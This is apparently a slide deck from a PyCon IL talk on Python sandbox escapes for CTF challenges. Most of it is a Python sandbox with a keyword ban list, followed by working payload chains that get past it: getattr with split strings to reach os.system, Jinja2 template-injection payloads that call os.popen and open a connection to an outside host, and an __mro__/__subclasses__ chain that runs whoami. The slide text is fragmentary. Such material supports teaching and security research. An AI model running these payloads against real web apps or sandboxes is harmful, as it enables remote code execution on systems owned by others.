-
1.
$
•
•
•
•
• @realgam3
• https://linkedin.com/in/realgam3
• https://github.com/realgam3
-
2.
Objects
-
3.
from __future__ import print_function
targets = __builtins__.__dict__.keys()
targets.remove('raw_input')
targets.remove('print')
for x in targets:
del __builtins__.__dict__[x]
-
4.
banned = [
"import",
"exec",
"eval",
"pickle",
"os",
"subprocess",
"kevin sucks",
"input",
"banned",
"cry sum more",
"sys"
]
-
5.
https://Links
• http://pyconil2018.realgame.co.il
• https://www.digitalwhisper.co.il/files/Zines/0x5A/DW90-
5-PySandbox.pdf
• https://github.com/vstinner/pysandbox
• https://nvisium.com/blog/2016/03/09/exploring-ssti-in-
flask-jinja2.html
-
6.
If You Really Like CTF Challenges
My name is Tomer Zait and I'm a security researcher on F5 Networks.
I’m practical software engineer and offensive security expert.
I Love CTF'S and writing open source software's.
By The Way Your are welcome to contribute code, or follow me in twitter or github.
Secure Pyshell:
print('')
print("")
print(".")
print(open)
print(__file__)
print(open(__file__))
print(getattr(open(__file__),"read"))
print(getattr(open(__file__),"read")())
print(__builtins__)
print(dir(__builtins__))
print(getattr(__builtins__,"vars"))
print(getattr(__builtins__,"va"+"rs"))
print(getattr(__builtins__,"va"+"rs")())
print(getattr(__builtins__,"va"+"rs")())
print(getattr(__builtins__,"va"+"rs")()["os"])
print(getattr(getattr(__builtins__,"va"+"rs")()["os"],"system"))
print(getattr(getattr(__builtins__,"va"+"rs")()["os"],"system")("ls"))
Zumbo 3:
{{1+1}}
{{request.environ}}
{{config}}
{%set a = 1+2%}{{a}}
{{config.__class__.__init__.__globals__}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{{[].__class__.__base__.__subclasses__()}}
{{[].__class__.__base__.__subclasses__()[351]}}
{%25set c=[].__class__.__base__.__subclasses__()[351]('realgame.co.il',80)%25}{%25set r=c.request('GET', '/pysandbox.html')%25}{{c.getresponse().read()}}
http://urllib3.readthedocs.io/en/latest/reference/#urllib3.connectionpool.HTTPConnectionPool
https://stackoverflow.com/questions/20646822/how-to-serve-static-files-in-flask
print("".__class__.__mro__)
print("".__class__.__mro__[-1].__subclasses__())
print([t.__name__ for t in "".__class__.__mro__[-1].__subclasses__()].index('WarningMessage'))
print("".__class__.__mro__[-1].__subclasses__()[59].__init__)
print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals)
print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"])
print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['os'])
print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'])
print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'].__dict__['s%stem' % 'ys'])
print("".__class__.__mro__[-1].__subclasses__()[59].__init__.func_globals["linecache"].__dict__['o' + 's'].__dict__['s%stem' % 'ys'])('whoami')
Ask
“What are the actual alternatives that omer simpson has”?